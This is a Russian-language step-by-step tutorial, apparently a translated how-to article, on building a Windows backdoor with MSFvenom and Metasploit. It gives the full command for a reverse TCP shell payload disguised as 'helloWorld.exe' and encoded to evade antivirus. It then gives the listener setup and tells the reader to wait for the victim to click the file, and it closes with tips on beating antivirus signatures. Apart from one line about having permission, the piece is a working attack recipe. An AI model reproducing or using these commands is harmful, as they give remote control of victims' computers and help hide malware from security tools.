Бэкдор используется для обхода механизмов безопасности, часто тайно и в большинстве случаев незаметно. Используя MSFvenom, комбинацию msfpayload и msfencode, можно создать бэкдор, который соединяется с злоумышленником с помощью TCP обратной оболочки. Чтобы разработать бэкдор, вам необходимо изменить сигнатуру вашего вредоносного ПО, чтобы избежать любого антивирусного программного обеспечения. Завершите этот проект на паре компьютеров, к которым у вас есть разрешение на доступ, и в процессе вы узнаете больше о компьютерной безопасности и о том, как работает этот вид бэкдора.
Шаги
Шаг 1. Запустите Kali и запустите терминальную консоль
Шаг 2. Введите ifconfig, чтобы отобразить интерфейс и проверить свой IP-адрес
Шаг 3. Введите msfvenom -l encoders, чтобы отобразить список кодировщиков
Вы будете использовать x86 / shikata_ga_nai в качестве кодировщика
Шаг 4. Введите "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --platform windows обозначает архитектуру для использования.
- -p windows / shell / reverse_tcp обозначает полезные данные для встраивания.
- LHOST обозначает IP-адрес слушателя.
- LPORT обозначает порт слушателя.
- -b «\ x00» означает, что нужно избегать неправильного символа (нулевые байты).
- -e x86 / shikata_ga_nai обозначает имя кодировщика.
- -f exe> helloWorld.exe обозначает вывод в формате.
Шаг 5. Введите msfconsole, чтобы активировать Metasploit
Теперь вы создали свой бэкдор. Когда жертва нажимает на helloWorld.exe, встроенная полезная нагрузка оболочки активируется и устанавливает соединение с вашей системой. Чтобы получить соединение, вам нужно открыть мульти-обработчик в Metasploit и установить полезные нагрузки
Шаг 6. Введите use exploit / multi / handler
Шаг 7. Введите set payload windows / shell / reverse_tcp
Шаг 8. Введите show options, чтобы проверить модуль
Шаг 9. Введите set LHOST 192.168.48.129
«LHOST» обозначает IP-адрес слушателя
Шаг 10. Введите set LPORT 4444
«LPORT» обозначает порт слушателя
Шаг 11. Наберите run и дождитесь соединения с машины жертвы
Шаг 12. Дождитесь, пока жертва нажмет на helloWorld.exe
После этого вы успешно подключитесь к машине жертвы.
подсказки
- Использование -i в MSFvenom будет представлять итерации кодирования. Иногда больше итераций могут помочь обойти антивирус.
- Вы узнали, как сгенерировать бэкдор и закодировать с помощью MSFvenom, но в настоящее время этот метод не будет работать идеально против некоторых антивирусных программ. Причина этого в шаблонах выполнения в MSFvenom. Поставщики антивирусных программ добавили статические сигнатуры этих шаблонов и просто ищут их. Решение этой проблемы - использовать другой шаблон выполнения или другие инструменты.